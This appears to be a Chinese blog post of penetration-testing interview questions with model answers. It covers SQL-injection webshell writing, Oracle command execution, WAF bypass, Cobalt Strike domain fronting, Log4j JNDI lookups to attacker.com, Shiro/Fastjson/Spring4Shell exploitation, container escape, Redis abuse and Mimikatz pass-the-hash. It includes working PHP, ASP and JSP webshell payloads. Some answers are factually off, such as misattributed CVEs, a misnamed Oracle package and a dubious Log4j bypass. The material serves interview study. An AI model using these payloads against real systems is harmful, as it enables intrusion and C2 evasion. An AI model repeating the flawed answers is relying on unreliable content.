2025年渗透测试面试题总结-拷打题库38(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库38

1. APP测试经验

核心要点

2. Xposed框架与App解密

扩展分析

3. SQL注入写马方式

技术细节

4. Oracle注入直接利用方式

非注入攻击路径

5. 绕过语义检测WAF

绕过技巧

6. 安全Response头配置

关键头信息

7. Cobalt Strike域前置原理与流量路径

流程详解

8. Kerberos认证流程

认证三阶段

9. Log4j绕过TrustCodeBase

绕过方法

10. SpringBoot+Shiro渗透思路

攻击链

11. 判断Fastjson版本

实战技巧

12. Fastjson文件读写Gadget

利用链分析

13. Spring4Shell(CVE-2022-22965)

漏洞利用

14. 后台登录框利用思路

攻击面扩展

15. 安卓RCE思路

攻击场景

16. 攻击Cloud环境App

云服务利用

17. K8s与Docker攻击方式

攻击链分析

18. CS域前置与云函数配置

部署流程

19. 内网设备利用(Hadoop/Kibana)

攻击路径

20. 攻击Redis的Linux系统差异

利用差异

21. SQL注入返回长度限制解决

截取方法

22. Windows10 PTH利用

绕过限制

2025年渗透测试面试题总结-拷打题库38

说说你APP测试的经验
xposed用的什么框架,有没有自己写过app解密
sql注入写马有哪些方式?
oracle注入除了注入之外有哪些直接利用的方式?
如何绕过基于语义检测的waf,比如雷池,阿里云waf等
信息安全相关的返回 response 头
cs 域前置的原理?流量是怎么通信的?从我直接执行一个命令,例如 whoami,然后到 机器上,中间的流量是怎么走的?
kerberos 原理
log4j 如何绕过 trustcodebase
Springboot+shiro 环境如何进行渗透
实战中如何判断 fastjson 的版本
Fastjson 文件读写 gadget 是哪条,原理是什么
Spring4shell 原理&检测&利用
给一个后台登录框有什么利用思路
安卓系统如何进行 rce,有什么思路
给一个移动端的 app,已知服务端是 cloud 环境,有什么思路利用
k8s 和 docker 如何去做攻击 有哪些利用方式 是什么原因导致的
cs 的域前置和云函数如何去配置
内网攻击的时候 内网有那些设备可以利用 (hadoop kibana 之类的设备)
攻击 redis 不同的 linux 系统有什么不同
sql 注入的时候,如果遇到了返回的时候长度不够,怎么解决,如何截取,用什么函数截 取
windows10上面的pth怎么利用

1. APP测试经验

核心要点
  1. 功能测试
    • 覆盖安装/卸载、UI交互、权限申请、多设备适配等场景。
    • 使用自动化工具(Appium、MonkeyRunner)进行压力测试。
  2. 安全测试
    • 反编译APK(Jadx、JEB)分析硬编码密钥、敏感逻辑(如加密算法)。
    • 检测HTTP/HTTPS请求是否未校验证书(SSL Pinning绕过)。
  3. 性能测试
    • 通过Android Profiler监控内存泄漏、CPU占用率及ANR问题。
    • 使用Frida动态Hook分析Native层性能瓶颈。

2. Xposed框架与App解密

扩展分析
  1. Xposed框架选择
    • LSPosed:基于Riru的模块化框架,支持Android 12+。
    • EdXposed:兼容性较好,但已停止维护。
  2. App解密实战
    • 场景:Hook网络库(OkHttp3)拦截加密请求/响应,动态修改算法参数。
    • 案例:针对某金融App,通过Hook javax.crypto.Cipher.init() 获取AES密钥。
  3. 自定义模块开发
    • 编写Xposed模块解密加固App(如360加固),定位Application类的attachBaseContext方法。

3. SQL注入写马方式

技术细节
  1. MySQL
    • SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/html/shell.php'
    • 前提:需要FILE权限及Web目录可写。
  2. MSSQL
    • 启用xp_cmdshell执行echo命令写入Web目录:
      sqlEXEC xp_cmdshell 'echo ^<^%eval request("cmd")%^>^ > C:\inetpub\shell.asp' 
      
  3. Oracle
    • 利用UTL_FILE包写入文件(需DBA权限):
      sqlDECLARE fh UTL_FILE.FILE_TYPE; BEGIN fh := UTL_FILE.FOPEN('WEB_DIR', 'shell.jsp', 'W'); UTL_FILE.PUT_LINE(fh, '<%@page import="java.lang.*"%><% Runtime.getRuntime().exec(request.getParameter("cmd"));%>'); UTL_FILE.FCLOSE(fh); END; 
      

4. Oracle注入直接利用方式

非注入攻击路径
  1. 权限提升
    • 利用DBMS_CDC_IPUBLISH包的漏洞(CVE-2012-3137)获取DBA权限。
  2. 系统命令执行
    • 通过Java存储过程调用Runtime.exec()
      sqlCREATE OR REPLACE JAVA SOURCE NAMED "Exec" AS import java.io.*; public class Exec { public static void run(String cmd) throws IOException { Runtime.getRuntime().exec(cmd); }}; 
  3. 文件系统访问
    • 使用DBMS_ADVISORY读取敏感文件(需CREATE ANY DIRECTORY权限)。

5. 绕过语义检测WAF

绕过技巧
  1. 编码混淆
    • Unicode编码:SEL%u0045CTSELECT;Hex编码:0x53454C454354
  2. 注释分割
    • 内联注释:SEL/*!88888abc*/ECT;换行符:SEL%0aECT
  3. 协议特性
    • HTTP分块传输:将Payload分块发送,绕过正则匹配。
    • 利用数据库特性:如MySQL的/*!50000SELECT*/语法绕过版本检测。

6. 安全Response头配置

关键头信息
  1. CSP(Content Security Policy)
    • Content-Security-Policy: default-src 'self' 防止XSS和数据泄露。
  2. HSTS(HTTP Strict Transport Security)
    • Strict-Transport-Security: max-age=31536000; includeSubDomains 强制HTTPS。
  3. 安全头组合
    • X-Content-Type-Options: nosniff 阻止MIME类型嗅探;
    • X-Frame-Options: DENY 防止点击劫持。

7. Cobalt Strike域前置原理与流量路径

流程详解
  1. 域前置(Domain Fronting)
    • 原理:利用CDN(如Cloudflare)将流量转发到真实C2服务器,HTTPS请求的SNI字段与Host头分离。
    • 配置:在C2配置中设置合法域名(如google.com ),实际解析到攻击者IP。
  2. 流量路径示例
    • 用户执行whoami → Beacon加密数据 → 通过Cloudflare转发 → C2服务器解密并执行命令 → 结果回传。

8. Kerberos认证流程

认证三阶段
  1. AS-REQ/AS-REP
    • 用户向AS(Authentication Server)请求TGT(Ticket Granting Ticket)。
  2. TGS-REQ/TGS-REP
    • 使用TGT向TGS(Ticket Granting Service)申请服务票据(ST)。
  3. AP-REQ/AP-REP
    • 用户向服务端提交ST,服务端验证票据有效性。

9. Log4j绕过TrustCodeBase

绕过方法
  1. 利用其他JNDI协议
    • ldap://rmi://,结合jndi:ldap://attacker.com/Exploit
  2. 上下文参数注入
    • ${ctx:user}${jndi:ldap://attacker.com} 动态拼接恶意URL。
  3. 环境变量触发
    • 通过${env:USER}触发二次解析,绕过黑名单检测。

10. SpringBoot+Shiro渗透思路

攻击链
  1. Shiro反序列化
    • 利用硬编码密钥解密RememberMe Cookie,构造CommonsBeanutils1 Gadget执行命令。
  2. 权限绕过
    • 路径遍历绕过鉴权:/;/admin → 匹配/admin权限规则失败。
  3. 结合Spring Boot Actuator
    • 未授权访问/actuator/env获取数据库密码,进一步利用数据库漏洞。

11. 判断Fastjson版本

实战技巧
  1. 报错信息法
    • 发送非法JSON触发异常,观察错误信息中的版本号。
  2. DNSLog探测
    • 构造Payload:{"@type":"java.net.Inet4Address","val":"dnslog.xxx"}
  3. 特征函数法
    • 测试AutoCloseable特性(1.2.25+支持)。

12. Fastjson文件读写Gadget

利用链分析
  1. TemplatesImpl链
    • 通过_bytecodes字段加载恶意字节码,触发getOutputProperties()执行代码。
  2. JdbcRowSetImpl链
    • 利用JNDI注入(需出网),触发setAutoCommit()连接恶意LDAP服务。

13. Spring4Shell(CVE-2022-22965)

漏洞利用
  1. 原理
    • 数据绑定漏洞通过class.module.classLoader 修改Tomcat日志路径,写入Webshell。
  2. 检测
    • 发送请求修改class.module.classLoader.resources.context.parent.pipeline.first.directory 参数,观察是否返回400错误。
  3. 利用
    • 修改日志文件名为shell.jsp ,写入JSP Webshell内容。

14. 后台登录框利用思路

攻击面扩展
  1. 弱口令爆破
    • 使用字典(admin/admin123)结合Burp Intruder爆破。
  2. 密码重置漏洞
    • 绕过验证码(重放攻击)、修改手机号参数(如mobile=attacker_phone)。
  3. OAuth劫持
    • 伪造OAuth回调地址,窃取合法用户会话令牌。

15. 安卓RCE思路

攻击场景
  1. Intent注入
    • 利用startActivityForResult未校验的Intent数据,启动恶意组件。
  2. 动态加载Dex
    • 通过DexClassLoader加载远程Dex文件执行恶意代码。
  3. JNI层漏洞
    • 利用Native库缓冲区溢出(如CVE-2021-0316)提权。

16. 攻击Cloud环境App

云服务利用
  1. 存储桶错误配置
    • 利用AWS S3 Bucket未授权访问,上传Webshell或窃取数据。
  2. Serverless函数注入
    • 通过Lambda函数环境变量获取AK/SK,横向控制其他服务。
  3. API密钥泄露
    • 从客户端代码或日志中提取云服务凭证,接管控制台权限。

17. K8s与Docker攻击方式

攻击链分析
  1. 未授权访问
    • K8s API Server未鉴权(6443端口),直接创建恶意Pod。
  2. 特权容器逃逸
    • 挂载宿主机根目录:docker run -v /:/host,利用chroot逃逸。
  3. 敏感配置泄露
    • /var/lib/kubelet/pods窃取Service Account Token。

18. CS域前置与云函数配置

部署流程
  1. 域前置配置
    • 在云函数(如AWS Lambda)绑定合法域名,C2 Profile设置CDN回源地址。
  2. 流量路径
    • 用户请求https://合法域名/api → 云函数转发至真实C2 → 加密通信。

19. 内网设备利用(Hadoop/Kibana)

攻击路径
  1. Hadoop未授权访问
    • 利用/ws/v1/cluster/apps提交恶意YARN任务执行命令。
  2. Kibana CVE-2019-7609
    • 原型链污染漏洞,通过Timelion插件执行任意代码。
  3. Redis未授权访问
    • 写入SSH公钥或Webshell,通过CONFIG SET dir修改路径。

20. 攻击Redis的Linux系统差异

利用差异
  1. CentOS/RHEL
    • 默认无AppArmor,可通过crontab写入定时任务。
  2. Ubuntu
    • AppArmor限制Redis写文件路径,需利用/proc/self/environ泄露信息。
  3. Alpine
    • 轻量级环境缺少bash,需使用shwget替代。

21. SQL注入返回长度限制解决

截取方法
  1. 分页截取
    • SUBSTRING((SELECT user()),1,10) → 分多次获取完整数据。
  2. 二分法
    • 结合ASCII()BETWEEN逐步缩小字符范围。
  3. 报错注入
    • 利用exp()函数溢出(MySQL)或CTE递归(MSSQL)绕过长度限制。

22. Windows10 PTH利用

绕过限制
  1. AES密钥替代NTLM
    • 使用Mimikatz抓取AES密钥(sekurlsa::ekeys),通过sekurlsa::pth注入。
  2. SMB签名绕过
    • 利用PetitPotam强制域控发起NTLM认证,中继至其他服务。
  3. 受限管理员模式
    • 启用RestrictedAdmin注册表项,允许RDP登录不暴露凭据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值